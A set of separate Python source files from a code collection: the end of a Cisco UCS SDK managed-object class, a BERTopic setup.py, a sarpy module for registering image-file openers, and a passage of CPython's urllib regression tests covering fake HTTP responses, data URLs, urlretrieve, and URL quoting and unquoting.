"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version221b, MoPropertyMeta.READ_WRITE, 0x10, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"type": MoPropertyMeta("type", "type", "string", VersionMeta.Version221b, MoPropertyMeta.NAMING, 0x20, None, None, None, ["primary", "secondary"], []),
"vnic_name": MoPropertyMeta("vnic_name", "vnicName", "string", VersionMeta.Version221b, MoPropertyMeta.READ_WRITE, 0x40, None, None, r"""[\-\.:_a-zA-Z0-9]{0,16}""", [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"rn": "rn",
"sacl": "sacl",
"status": "status",
"type": "type",
"vnicName": "vnic_name",
}
def __init__(self, parent_mo_or_dn, type, **kwargs):
self._dirty_mask = 0
self.type = type
self.child_action = None
self.sacl = None
self.status = None
self.vnic_name = None
ManagedObject.__init__(self, "LsbootSanCatSanImage", parent_mo_or_dn, **kwargs)
|
the-stack_0_6584 | import setuptools
test_packages = [
"pytest>=5.4.3",
"pytest-cov>=2.6.1"
]
docs_packages = [
"mkdocs==1.1",
"mkdocs-material==4.6.3",
"mkdocstrings==0.8.0",
]
dev_packages = docs_packages + test_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="bertopic",
packages=["bertopic"],
version="0.3.3",
author="Maarten Grootendorst",
author_email="[email protected]",
description="BERTopic performs topic Modeling with state-of-the-art transformer models.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/MaartenGr/BERTopic",
keywords="nlp bert topic modeling embeddings",
classifiers=[
"Programming Language :: Python",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: MIT License",
"Topic :: Scientific/Engineering",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Operating System :: Unix",
"Operating System :: MacOS",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.8",
],
install_requires=[
'torch',
'tqdm',
'numpy',
'umap-learn',
'hdbscan',
'pandas',
'scikit_learn',
'sentence_transformers',
'joblib',
'matplotlib'
],
extras_require={
"test": test_packages,
"docs": docs_packages,
"dev": dev_packages,
},
python_requires='>=3.6',
) |
the-stack_0_6585 | # -*- coding: utf-8 -*-
"""
This module provide utilities for attempting to open other image files not opened by
the sicd, sidd, or cphd reader collections.
"""
import os
import sys
import pkgutil
from importlib import import_module
from sarpy.io.general.base import BaseReader
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
###########
# Module variables
_openers = []
_parsed_openers = False
def register_opener(open_func):
"""
Provide a new opener.
Parameters
----------
open_func
This is required to be a function which takes a single argument (file name).
This function should return a sarpy.io.general.base.BaseReader instance
if the referenced file is viable for the underlying type, and None otherwise.
Returns
-------
None
"""
if not callable(open_func):
raise TypeError('open_func must be a callable')
if open_func not in _openers:
_openers.append(open_func)
def parse_openers():
"""
Automatically find the viable openers (i.e. :func:`is_a`) in the various modules.
Returns
-------
"""
global _parsed_openers
if _parsed_openers:
return
_parsed_openers = True
def check_module(mod_name):
# import the module
import_module(mod_name)
# fetch the module from the modules dict
module = sys.modules[mod_name]
# see if it has an is_a function, if so, register it
if hasattr(module, 'is_a'):
register_opener(module.is_a)
# walk down any subpackages
path, fil = os.path.split(module.__file__)
if not fil.startswith('__init__.py'):
# there are no subpackages
return
for sub_module in pkgutil.walk_packages([path, ]):
_, sub_module_name, _ = sub_module
sub_name = "{}.{}".format(mod_name, sub_module_name)
check_module(sub_name)
check_module('sarpy.io.other_image')
def open_other(file_name):
"""
Given a file, try to find and return the appropriate reader object.
Parameters
----------
file_name : str
Returns
-------
BaseReader
Raises
------
IOError
"""
if not os.path.exists(file_name):
raise IOError('File {} does not exist.'.format(file_name))
# parse openers, if not already done
parse_openers()
# see if we can find a reader though trial and error
for opener in _openers:
reader = opener(file_name)
if reader is not None:
return reader
# If for loop completes, no matching file format was found.
raise IOError('Unable to determine image format.')
|
the-stack_0_6592 | """Regresssion tests for urllib"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from test import support
import os
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
opener = urllib.request.FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(fakedata)
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = FakeHTTPConnection
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:[email protected]/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:[email protected]/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded by with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
